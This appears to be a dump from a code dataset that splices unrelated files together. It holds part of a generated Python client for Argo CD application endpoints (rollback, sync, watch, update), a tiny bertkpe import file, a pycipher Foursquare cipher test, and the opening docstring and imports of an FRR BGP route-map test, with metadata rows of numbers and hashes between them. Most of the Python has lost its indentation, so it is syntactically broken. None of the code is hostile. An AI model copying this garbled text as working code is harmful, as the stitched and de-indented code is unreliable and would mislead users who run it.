                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1Application
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_rollback = _Endpoint(
settings={
'response_type': (V1alpha1Application,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/rollback',
'operation_id': 'application_service_rollback',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'name',
'body',
],
'required': [
'name',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'body':
(ApplicationApplicationRollbackRequest,),
},
'attribute_map': {
'name': 'name',
},
'location_map': {
'name': 'path',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_rollback
)
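        # Usage sketch (field name assumed from the generated request model; the
        # id is understood to reference an entry in the deployment history):
        #
        #     body = ApplicationApplicationRollbackRequest(id='7')
        #     app = api.application_service_rollback('guestbook', body)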
def __application_service_run_resource_action(
self,
name,
body,
**kwargs
):
"""RunResourceAction run resource action # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_run_resource_action(name, body, async_req=True)
>>> result = thread.get()
Args:
name (str):
body (str):
Keyword Args:
namespace (str): [optional]
resource_name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
bool, date, datetime, dict, float, int, list, str, none_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_run_resource_action = _Endpoint(
settings={
'response_type': (bool, date, datetime, dict, float, int, list, str, none_type,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/resource/actions',
'operation_id': 'application_service_run_resource_action',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'name',
'body',
'namespace',
'resource_name',
'version',
'group',
'kind',
],
'required': [
'name',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'body':
(str,),
'namespace':
(str,),
'resource_name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
},
'attribute_map': {
'name': 'name',
'namespace': 'namespace',
'resource_name': 'resourceName',
'version': 'version',
'group': 'group',
'kind': 'kind',
},
'location_map': {
'name': 'path',
'body': 'body',
'namespace': 'query',
'resource_name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_run_resource_action
)
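        # Usage sketch: the action name is sent as the string body, with the
        # target resource selected by query parameters (hypothetical action name;
        # which actions exist depends on the resource kind):
        #
        #     api.application_service_run_resource_action(
        #         'guestbook', 'restart',
        #         namespace='default', resource_name='guestbook-ui',
        #         group='apps', version='v1', kind='Deployment',
        #     )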
def __application_service_sync(
self,
name,
body,
**kwargs
):
"""Sync syncs an application to its target state # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_sync(name, body, async_req=True)
>>> result = thread.get()
Args:
name (str):
body (ApplicationApplicationSyncRequest):
Keyword Args:
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1Application
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_sync = _Endpoint(
settings={
'response_type': (V1alpha1Application,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/sync',
'operation_id': 'application_service_sync',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'name',
'body',
],
'required': [
'name',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'body':
(ApplicationApplicationSyncRequest,),
},
'attribute_map': {
'name': 'name',
},
'location_map': {
'name': 'path',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_sync
)
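        # Usage sketch: a sync can run synchronously or be handed to a worker
        # thread via async_req (request-model field names assumed):
        #
        #     body = ApplicationApplicationSyncRequest(revision='HEAD', prune=True)
        #     thread = api.application_service_sync('guestbook', body, async_req=True)
        #     app = thread.get()   # blocks until the HTTP call completes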
def __application_service_terminate_operation(
self,
name,
**kwargs
):
"""TerminateOperation terminates the currently running operation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_terminate_operation(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
bool, date, datetime, dict, float, int, list, str, none_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_terminate_operation = _Endpoint(
settings={
'response_type': (bool, date, datetime, dict, float, int, list, str, none_type,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/operation',
'operation_id': 'application_service_terminate_operation',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'name',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
},
'attribute_map': {
'name': 'name',
},
'location_map': {
'name': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_terminate_operation
)
def __application_service_update(
self,
application_metadata_name,
body,
**kwargs
):
"""Update updates an application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_update(application_metadata_name, body, async_req=True)
>>> result = thread.get()
Args:
application_metadata_name (str): Name must be unique within a namespace. Is required when creating resources, although some resources may allow a client to request the generation of an appropriate name automatically. Name is primarily intended for creation idempotence and configuration definition. Cannot be updated. More info: http://kubernetes.io/docs/user-guide/identifiers#names +optional
body (V1alpha1Application):
Keyword Args:
validate (bool): [optional]
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1Application
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['application_metadata_name'] = \
application_metadata_name
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_update = _Endpoint(
settings={
'response_type': (V1alpha1Application,),
'auth': [],
'endpoint_path': '/api/v1/applications/{application.metadata.name}',
'operation_id': 'application_service_update',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'application_metadata_name',
'body',
'validate',
],
'required': [
'application_metadata_name',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'application_metadata_name':
(str,),
'body':
(V1alpha1Application,),
'validate':
(bool,),
},
'attribute_map': {
'application_metadata_name': 'application.metadata.name',
'validate': 'validate',
},
'location_map': {
'application_metadata_name': 'path',
'body': 'body',
'validate': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_update
)
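        # Note that the path parameter maps to the nested field
        # application.metadata.name, surfaced here as application_metadata_name
        # (attribute access below assumed from the generated models):
        #
        #     app = api.application_service_update(app.metadata.name, app, validate=False)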
def __application_service_update_spec(
self,
name,
body,
**kwargs
):
"""UpdateSpec updates an application spec # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_update_spec(name, body, async_req=True)
>>> result = thread.get()
Args:
name (str):
body (V1alpha1ApplicationSpec):
Keyword Args:
validate (bool): [optional]
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1ApplicationSpec
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_update_spec = _Endpoint(
settings={
'response_type': (V1alpha1ApplicationSpec,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/spec',
'operation_id': 'application_service_update_spec',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'name',
'body',
'validate',
],
'required': [
'name',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'body':
(V1alpha1ApplicationSpec,),
'validate':
(bool,),
},
'attribute_map': {
'name': 'name',
'validate': 'validate',
},
'location_map': {
'name': 'path',
'body': 'body',
'validate': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_update_spec
)
def __application_service_watch(
self,
**kwargs
):
"""Watch returns stream of application change events # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_watch(async_req=True)
>>> result = thread.get()
Keyword Args:
            name (str): the application's name. [optional]
            refresh (str): forces application reconciliation if set to true. [optional]
            project ([str]): the project names to restrict the returned list of applications. [optional]
            resource_version (str): when specified with a watch call, shows changes that occur after that particular version of a resource. [optional]
            selector (str): the selector to restrict the returned list to applications with matching labels. [optional]
            repo (str): the repoURL to restrict the returned list of applications. [optional]
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
StreamResultOfV1alpha1ApplicationWatchEvent
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.application_service_watch = _Endpoint(
settings={
'response_type': (StreamResultOfV1alpha1ApplicationWatchEvent,),
'auth': [],
'endpoint_path': '/api/v1/stream/applications',
'operation_id': 'application_service_watch',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'refresh',
'project',
'resource_version',
'selector',
'repo',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'refresh':
(str,),
'project':
([str],),
'resource_version':
(str,),
'selector':
(str,),
'repo':
(str,),
},
'attribute_map': {
'name': 'name',
'refresh': 'refresh',
'project': 'project',
'resource_version': 'resourceVersion',
'selector': 'selector',
'repo': 'repo',
},
'location_map': {
'name': 'query',
'refresh': 'query',
'project': 'query',
'resource_version': 'query',
'selector': 'query',
'repo': 'query',
},
'collection_format_map': {
'project': 'multi',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_watch
)
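        # Usage sketch: the watch endpoint emits a long-lived JSON event stream,
        # so it is usually consumed with _preload_content=False and a read loop
        # instead of one decoded response:
        #
        #     resp = api.application_service_watch(name='guestbook', _preload_content=False)
        #     for raw_event in resp:
        #         handle(raw_event)  # hypothetical handler; one event per line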
def __application_service_watch_resource_tree(
self,
application_name,
**kwargs
):
"""Watch returns stream of application resource tree # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_watch_resource_tree(application_name, async_req=True)
>>> result = thread.get()
Args:
application_name (str):
Keyword Args:
namespace (str): [optional]
name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
StreamResultOfV1alpha1ApplicationTree
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['application_name'] = \
application_name
return self.call_with_http_info(**kwargs)
self.application_service_watch_resource_tree = _Endpoint(
settings={
'response_type': (StreamResultOfV1alpha1ApplicationTree,),
'auth': [],
'endpoint_path': '/api/v1/stream/applications/{applicationName}/resource-tree',
'operation_id': 'application_service_watch_resource_tree',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'application_name',
'namespace',
'name',
'version',
'group',
'kind',
],
'required': [
'application_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'application_name':
(str,),
'namespace':
(str,),
'name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
},
'attribute_map': {
'application_name': 'applicationName',
'namespace': 'namespace',
'name': 'name',
'version': 'version',
'group': 'group',
'kind': 'kind',
},
'location_map': {
'application_name': 'path',
'namespace': 'query',
'name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_watch_resource_tree
)
| 37.906718 | 409 | 0.448748 | 10,824 | 136,540 | 5.419069 | 0.03446 | 0.027312 | 0.022163 | 0.023016 | 0.894538 | 0.880745 | 0.868419 | 0.855684 | 0.848217 | 0.844688 | 0 | 0.004631 | 0.465431 | 136,540 | 3,601 | 410 | 37.917245 | 0.798986 | 0.307426 | 0 | 0.731951 | 1 | 0 | 0.220627 | 0.041779 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010371 | false | 0 | 0.008775 | 0 | 0.029517 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ec6182bb69541372d460d7fd181654c719015734 | 89 | py | Python | bertkpe/evaluator/__init__.py | kariswr/Multilingual-BERT-KPE | adecc46390fbf5e92846dd60a51a42fba8754c52 | ["MIT"] | 274 | 2020-04-28T13:24:09.000Z | 2022-03-29T08:59:55.000Z | bertkpe/evaluator/__init__.py | kariswr/Multilingual-BERT-KPE | adecc46390fbf5e92846dd60a51a42fba8754c52 | ["MIT"] | 12 | 2020-10-20T17:34:31.000Z | 2022-02-24T14:57:32.000Z | bertkpe/evaluator/__init__.py | kariswr/Multilingual-BERT-KPE | adecc46390fbf5e92846dd60a51a42fba8754c52 | ["MIT"] | 59 | 2020-05-08T18:04:43.000Z | 2022-03-12T01:41:32.000Z |
from .openkp_evaluator import evaluate_openkp
from .kp20k_evaluator import evaluate_kp20k
| 44.5 | 45 | 0.898876 | 12 | 89 | 6.333333 | 0.5 | 0.394737 | 0.605263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04878 | 0.078652 | 89 | 2 | 46 | 44.5 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ec8dd06c93b1cb26a47738ef7b7f82ece078f352 | 1,452 | py | Python | tests/test_foursquare.py | onlykood/pycipher | 8f1d7cf3cba4e12171e27d9ce723ad890194de19 | ["MIT"] | 196 | 2015-01-16T19:09:19.000Z | 2022-03-13T16:19:21.000Z | tests/test_foursquare.py | rafaelmessias/pycipher | 787eb947a173138869ddd388b5331559e5cd3a5a | ["MIT"] | 9 | 2015-10-09T18:07:32.000Z | 2021-12-22T12:04:00.000Z | tests/test_foursquare.py | rafaelmessias/pycipher | 787eb947a173138869ddd388b5331559e5cd3a5a | ["MIT"] | 76 | 2015-02-08T23:17:43.000Z | 2021-12-27T04:15:30.000Z |
from pycipher import Foursquare
import unittest
class TestFoursquare(unittest.TestCase):
def test_encipher(self):
keys = (('zgptfoihmuwdrcnykeqaxvsbl','mfnbdcrhsaxyogvituewlqzkp'),
('iebvsurpxanmqoywdlztfkcgh','fobgqehdpwrviknazytmsculx'))
plaintext = ('abcdefghiiklmnopqrstuvwxyzabcdefghiiklmnopqrstuvwxyz',
'abcdefghiiklmnopqrstuvwxyzabcdefghiiklmnopqrstuvwxyz')
ciphertext = ('gmtnzahrmsovryngkiquypsqlkgmtnzahrmsovryngkiquypsqlk',
'efvbiwphxpunqvykdazywxcchlefvbiwphxpunqvykdazywxcchl')
        for i, key in enumerate(keys):
enc = Foursquare(*key).encipher(plaintext[i])
self.assertEqual(enc.upper(), ciphertext[i].upper())
def test_decipher(self):
keys = (('zgptfoihmuwdrcnykeqaxvsbl','mfnbdcrhsaxyogvituewlqzkp'),
('iebvsurpxanmqoywdlztfkcgh','fobgqehdpwrviknazytmsculx'))
        plaintext = ('abcdefghiiklmnopqrstuvwxyzabcdefghiiklmnopqrstuvwxyz',
'abcdefghiiklmnopqrstuvwxyzabcdefghiiklmnopqrstuvwxyz')
ciphertext = ('gmtnzahrmsovryngkiquypsqlkgmtnzahrmsovryngkiquypsqlk',
'efvbiwphxpunqvykdazywxcchlefvbiwphxpunqvykdazywxcchl')
        for i, key in enumerate(keys):
dec = Foursquare(*key).decipher(ciphertext[i])
self.assertEqual(dec.upper(), plaintext[i].upper())
if __name__ == '__main__':
unittest.main()
| 48.4 | 77 | 0.688017 | 83 | 1,452 | 11.915663 | 0.421687 | 0.014156 | 0.066734 | 0.11729 | 0.721941 | 0.721941 | 0.721941 | 0.721941 | 0.721941 | 0.721941 | 0 | 0 | 0.21832 | 1,452 | 29 | 78 | 50.068966 | 0.871366 | 0 | 0 | 0.56 | 0 | 0 | 0.429752 | 0.424242 | 0 | 0 | 0 | 0 | 0.08 | 1 | 0.08 | false | 0 | 0.08 | 0 | 0.2 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
eccb2c1bf21c90254df05d760c3f0d3122c8d06a | 138,651 | py | Python | src/frr/tests/topotests/bgp_route_map/test_route_map_topo2.py | zhouhaifeng/vpe | 9c644ffd561988e5740021ed26e0f7739844353d | ["Apache-2.0"] | null | null | null | src/frr/tests/topotests/bgp_route_map/test_route_map_topo2.py | zhouhaifeng/vpe | 9c644ffd561988e5740021ed26e0f7739844353d | ["Apache-2.0"] | null | null | null | src/frr/tests/topotests/bgp_route_map/test_route_map_topo2.py | zhouhaifeng/vpe | 9c644ffd561988e5740021ed26e0f7739844353d | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python
#
# Copyright (c) 2019 by VMware, Inc. ("VMware")
# Used Copyright (c) 2018 by Network Device Education Foundation,
# Inc. ("NetDEF") in this file.
#
# Permission to use, copy, modify, and/or distribute this software
# for any purpose with or without fee is hereby granted, provided
# that the above copyright notice and this permission notice appear
# in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND VMWARE DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL VMWARE BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
#
"""Following tests are covered to test route-map functionality.
TC_57:
Create route map to match prefix-list and permit inbound
and outbound prefixes and set criteria on match
TC_52:
Test modify set/match clauses in a route-map to see
if it takes immediate effect.
TC_61:
Delete the route maps.
TC_50_1:
Test modify/remove prefix-lists referenced by a
route-map for match statement.
TC_50_2:
Remove prefix-list referenced by route-map match clause
and verify it is reflected as intended
TC_51:
Add and remove community-list referenced by route-map match clause
and verify it is reflected as intended
TC_45:
Test multiple match statements as part of a route-map's single
sequence number. (Logical OR-ed of multiple match statements)
TC_44:
Test multiple match statements as part of a route-map's single
sequence number. (Logical AND of multiple match statements)
TC_41:
Test add/remove route-maps to specific neighbor and see if
it takes effect as intended
TC_56:
Test clear BGP sessions and interface flaps to see if
route-map properties are intact.
TC_46:
Verify if a blank sequence number can be created (without any
match/set clause) and check if it allows all the traffic/prefixes
TC_48:
Create route map setting local preference and weight to eBGP peer
and metric to iBGP peer, verifying it does not get advertised
TC_43:
Test multiple set statements as part of a route-map's
single sequence number.
TC_54:
Verify route-maps continue clause functionality.
TC_55:
Verify route-maps goto clause functionality.
TC_53:
Verify route-maps call clause functionality.
TC_58:
Create route map deny inbound and outbound prefixes on
match prefix list and set criteria on match
TC_59:
Create route map to permit inbound prefixes with filter
match tag and set criteria
TC_60:
Create route map to deny outbound prefixes with filter match tag,
and set criteria
#################################
# TOPOLOGY
#################################
          +-------+
+---------|  R2   |
|         +-------+
|iBGP         |
+-------+     |
|  R1   |     |iBGP
+-------+     |
   |          |
   | iBGP +-------+  eBGP   +-------+
   +------|  R3   |---------|  R4   |
          +-------+         +-------+
              |
              |eBGP
              |
          +-------+
          |  R5   |
          +-------+
"""
import sys
import time
import pytest
import inspect
import os
from time import sleep
# Save the Current Working Directory to find configuration files.
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CWD, "../"))
# pylint: disable=C0413
# Import topogen and topotest helpers
from lib.topogen import Topogen, get_topogen
# Required to instantiate the topology builder class.
from lib.common_config import (
start_topology,
write_test_header,
write_test_footer,
create_static_routes,
verify_rib,
delete_route_maps,
create_bgp_community_lists,
create_route_maps,
create_prefix_lists,
verify_route_maps,
check_address_types,
verify_bgp_community,
shutdown_bringup_interface,
verify_prefix_lists,
reset_config_on_routers,
verify_create_community_list,
)
from lib.topolog import logger
from lib.bgp import (
verify_bgp_convergence,
create_router_bgp,
clear_bgp_and_verify,
verify_bgp_attributes,
)
